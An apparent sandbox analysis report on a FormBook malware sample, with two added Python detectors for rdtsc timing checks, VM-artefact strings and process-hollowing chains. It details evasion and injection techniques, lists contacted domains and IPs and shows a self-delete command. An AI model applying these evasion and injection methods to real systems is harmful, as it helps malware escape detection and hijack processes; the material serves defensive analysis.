Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
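The two evasion indicators listed in this section, the rdtsc / xor ecx, ecx / add ecx, eax / rdtsc timing sequence intercepted at 0x408604 and 0x40898E and the Sandboxie, Wine and VMware Tools artefact strings found in memory, can be triaged statically from a memory dump or unpacked image. The Python script below is an added example written for this page; it is not tooling from the sandbox vendor and not code recovered from the sample. The image it scans is constructed here to mirror the report's findings: the byte encoding chosen for xor ecx, ecx and add ecx, eax is one valid encoding (the report shows only the disassembly), and the 0x400000 image base is assumed.

```python
"""Static triage for two evasion indicators: paired rdtsc timing checks and
sandbox/VM artefact strings. Added example; not sandbox-vendor tooling."""
import re

RDTSC = b"\x0f\x31"  # opcode of the rdtsc instruction

# Strings the report found in the sample's memory, and what each one probes for.
ANTI_ANALYSIS_STRINGS = {
    b"SbieDll.dll": "Sandboxie",
    b"wine_get_unix_file_name": "Wine",
    b"SOFTWARE\\VMware, Inc.\\VMware Tools": "VMware Tools registry key",
    b"VMware SVGA": "VMware display adapter",
}


def find_rdtsc_pairs(blob, max_gap=16):
    """Offsets (first, second) of rdtsc opcodes at most max_gap bytes apart:
    the shape of a timing check (read TSC, do trivial work, read TSC, compare)."""
    offsets = [m.start() for m in re.finditer(re.escape(RDTSC), blob)]
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


def find_anti_analysis_strings(blob):
    """Case-insensitive search; the sandbox prints these strings upper-cased
    while the binary usually carries mixed case. Returns {offset: meaning}."""
    low = blob.lower()
    hits = {}
    for needle, meaning in ANTI_ANALYSIS_STRINGS.items():
        pos = low.find(needle.lower())
        while pos != -1:
            hits[pos] = meaning
            pos = low.find(needle.lower(), pos + 1)
    return hits


def triage(blob, image_base=0):
    """Rebase every hit to a virtual address and summarise."""
    pairs = [(image_base + a, image_base + b) for a, b in find_rdtsc_pairs(blob)]
    strings = {image_base + off: m for off, m in find_anti_analysis_strings(blob).items()}
    return {"rdtsc_pairs": pairs, "strings": strings,
            "evasive": bool(pairs) or bool(strings)}


# The 8-byte sequence from the report, in one valid encoding (the report shows
# only the disassembly, so the exact bytes are an assumption):
TIMING_CHECK = (
    b"\x0f\x31"   # rdtsc            -> edx:eax = time-stamp counter
    b"\x31\xc9"   # xor ecx, ecx
    b"\x01\xc1"   # add ecx, eax     -> ecx = low 32 bits of the first reading
    b"\x0f\x31"   # rdtsc            -> eax - ecx is the elapsed cycle count
)


def build_sample_blob():
    """Constructed 0x9000-byte image: the timing check at the two offsets that
    map to 0x408604 and 0x40898E under an assumed 0x400000 base, plus the three
    artefact strings the report lists."""
    blob = bytearray(0x9000)
    blob[0x8604:0x8604 + len(TIMING_CHECK)] = TIMING_CHECK
    blob[0x898E:0x898E + len(TIMING_CHECK)] = TIMING_CHECK
    for off, s in ((0x1000, b"SbieDll.dll"),
                   (0x2000, b"SOFTWARE\\VMware, Inc.\\VMware Tools"),
                   (0x3000, b"kernel32.dll.wine_get_unix_file_name")):
        blob[off:off + len(s)] = s
    return bytes(blob)


if __name__ == "__main__":
    report = triage(build_sample_blob(), image_base=0x400000)
    for first, second in report["rdtsc_pairs"]:
        print(f"rdtsc pair at {first:#010x} / {second:#010x}")
    for va, meaning in sorted(report["strings"].items()):
        print(f"artefact string at {va:#010x}: {meaning}")
```

The 16-byte window is deliberately tight; widen it if a compiler has interleaved more work between the two reads. Treat an rdtsc pair as a lead rather than a verdict, since profilers and some crypto libraries read the counter too; here the sandbox's interceptor confirmed both pairs executed as a check, and the artefact strings corroborate the intent.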

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00AC26F8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h] 7_2_020226F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe Network Connect: 172.67.184.102 80
Source: C:\Windows\explorer.exe Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into foreign processes
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp Binary or memory string: Program Manager<
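Read together, the signatures in this section describe one injection chain: a process is created suspended, its image section is unmapped (cmstp.exe at base 110000), a PE image (4D5A) is written at the original base, the main thread's context is rewritten and the thread is resumed; separately, an APC is queued into explorer.exe and its thread context is modified. The Python detector below is an added example, not part of the sandbox report or its vendor's code. It correlates API-trace events into per-(source, target) chains and distinguishes a full hollow from an in-place PE overwrite, APC queueing and a bare thread-context change. The event schema is assumed; PIDs 1528 (ashlkyvc7592.exe) and 1764 (the thread-context target) are taken from the report, while 2001, 2002, 3000/3001 and 4000/4001 are assumed for the constructed trace.

```python
"""Correlate process-level API events into code-injection chains.
Added example for this page; the event schema is assumed, not a sandbox format."""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # CreateProcess dwCreationFlags bit

# Stages of classic process hollowing, in the order they must occur.
HOLLOWING_CHAIN = (
    "create_suspended", "unmap_section", "write_pe_header",
    "set_thread_context", "resume_thread",
)
# The same chain without the unmap: the child image is overwritten in place.
OVERWRITE_CHAIN = ("write_pe_header", "set_thread_context", "resume_thread")


def stage_of(event):
    """Map one raw API event onto a chain stage; None if it is irrelevant."""
    api = event["api"]
    if api == "CreateProcess" and event.get("flags", 0) & CREATE_SUSPENDED:
        return "create_suspended"
    if api == "NtUnmapViewOfSection":
        return "unmap_section"
    if api == "WriteProcessMemory" and event.get("data", b"")[:2] == b"MZ":
        return "write_pe_header"
    if api in ("SetThreadContext", "NtSetContextThread"):
        return "set_thread_context"
    if api in ("ResumeThread", "NtResumeThread"):
        return "resume_thread"
    if api in ("QueueUserAPC", "NtQueueApcThread"):
        return "queue_apc"
    return None


def in_order(seen, required):
    """True if every stage in `required` appears in `seen` in that order;
    unrelated stages may be interleaved, but out-of-order stages do not count."""
    it = iter(seen)
    return all(stage in it for stage in required)


def classify_chains(events):
    """Return {(source_pid, target_pid): verdict} for every cross-process
    interaction that touched at least one chain stage."""
    stages = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage is not None and ev["pid"] != ev["target_pid"]:
            stages[(ev["pid"], ev["target_pid"])].append(stage)

    verdicts = {}
    for key, seen in stages.items():
        if in_order(seen, HOLLOWING_CHAIN):
            verdicts[key] = "process_hollowing"
        elif in_order(seen, OVERWRITE_CHAIN):
            verdicts[key] = "pe_overwrite_without_unmap"
        elif "queue_apc" in seen:
            verdicts[key] = "apc_injection"
        elif "set_thread_context" in seen:
            verdicts[key] = "thread_context_modified"
        else:
            verdicts[key] = "incomplete"
    return verdicts


def _ev(ts, pid, api, target_pid, **extra):
    return {"ts": ts, "pid": pid, "api": api, "target_pid": target_pid, **extra}


# Constructed trace mirroring the report's chain. PIDs 1528 (ashlkyvc7592.exe)
# and 1764 (thread-context target) come from the report; 2001 (second
# ashlkyvc7592.exe), 2002 (cmstp.exe), 3000/3001 and 4000/4001 are assumed.
SAMPLE_EVENTS = [
    _ev(1, 1528, "CreateProcess", 2001, flags=CREATE_SUSPENDED),
    _ev(2, 1528, "WriteProcessMemory", 2001, base=0x400000, data=b"MZ\x90\x00"),
    _ev(3, 1528, "SetThreadContext", 2001),
    _ev(4, 1528, "ResumeThread", 2001),
    _ev(5, 2001, "CreateProcess", 2002, flags=CREATE_SUSPENDED),
    _ev(6, 2001, "NtUnmapViewOfSection", 2002, base=0x110000),
    _ev(7, 2001, "WriteProcessMemory", 2002, base=0x110000, data=b"MZ\x90\x00"),
    _ev(8, 2001, "SetThreadContext", 2002),
    _ev(9, 2001, "ResumeThread", 2002),
    _ev(10, 1528, "QueueUserAPC", 1764),
    _ev(11, 2002, "SetThreadContext", 1764),
    _ev(12, 3000, "ResumeThread", 3001),           # lone resume: not enough evidence
    _ev(13, 4000, "CreateProcess", 4001, flags=0),  # normal spawn: ignored
]

if __name__ == "__main__":
    for (src, dst), verdict in sorted(classify_chains(SAMPLE_EVENTS).items()):
        print(f"{src} -> {dst}: {verdict}")
```

The subsequence test is what keeps the false-positive rate down: a debugger that sets a thread context and then resumes the thread never satisfies the hollowing chain because it never created the process suspended or wrote an MZ header, while a loader that writes its payload in several chunks still matches as long as the header lands before the context change. Only the first two bytes of each write are inspected, so a payload whose header is written last is still caught.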

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Queries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: the same 20 unpacked PE and memory dump sources listed under Stealing of Sensitive Information above